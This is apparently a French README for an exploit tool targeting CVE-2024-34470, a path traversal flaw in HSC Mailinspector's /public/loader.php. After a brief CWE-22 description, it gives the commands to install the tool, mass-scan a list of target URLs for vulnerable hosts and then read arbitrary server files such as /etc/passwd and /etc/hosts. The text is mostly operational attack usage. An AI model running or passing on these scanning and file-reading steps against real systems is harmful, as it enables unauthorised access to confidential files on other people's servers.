
Une vulnérabilité critique a été découverte dans HSC Mailinspector jusqu'à la version 5.2.18. Cette vulnérabilité affecte une fonctionnalité inconnue du fichier /public/loader.php.
Une vulnérabilité critique a été découverte dans HSC Mailinspector jusqu'à la version 5.2.18. Cette vulnérabilité affecte une fonctionnalité inconnue du fichier /public/loader.php. La manipulation de l'argument 'path' avec une entrée inconnue conduit à une vulnérabilité de traversée de chemin. Selon CWE, ce problème est classé comme CWE-22. Le produit utilise une entrée externe pour construire un chemin d'accès destiné à identifier un fichier ou un répertoire situé sous un répertoire parent restreint, mais le produit ne neutralise pas correctement les éléments spéciaux dans le chemin qui peuvent amener le chemin à résoudre en un emplacement en dehors du répertoire restreint. Cela affecte la confidentialité, l'intégrité et la disponibilité.
Clone the repository:
git clone https://CVE-2024-34470.git
cd CVE-2024-34470
Installer les dépendances
Assurez-vous que Python et pip sont installés. Ensuite, exécutez :
pip install -r requirements.txt
Pour effectuer une recherche sur plusieurs cibles à l'aide d'un fichier texte, utilisez le script Massive_CVE-2024-34470.py
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null
Le format dans lequel le fichier urls.txt doit être est le suivant :
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
Une fois les cibles vulnérables identifiées, nous utilisons le script appelé CVE-2024-34470.py pour exploiter et afficher le contenu spécifié via le terminal.
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null
# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts
![[screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)